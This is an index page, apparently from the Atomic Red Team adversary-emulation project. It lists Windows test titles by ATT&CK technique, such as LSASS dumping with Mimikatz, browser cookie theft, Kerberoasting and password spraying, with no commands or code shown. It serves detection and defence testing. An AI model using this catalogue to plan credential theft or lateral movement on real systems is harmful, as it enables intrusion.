- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
- Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
- Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
- Atomic Test #8: Password Spray using Kerbrute Tool [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- Atomic Test #6: WinPwn - sensitivefiles [windows]
- Atomic Test #7: WinPwn - Snaffler [windows]
- Atomic Test #8: WinPwn - powershellsensitive [windows]
- Atomic Test #9: WinPwn - passhunt [windows]
- Atomic Test #10: WinPwn - SessionGopher [windows]
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- Atomic Test #3: WinPwn - GPOAudit [windows]
- Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- Atomic Test #15: WinPwn - generaldomaininfo [windows]
- Atomic Test #16: Kerbrute - userenum [windows]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #8: WinPwn - shareenumeration [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #13: WinPwn - winPEAS [windows]
- Atomic Test #14: WinPwn - itm4nprivesc [windows]
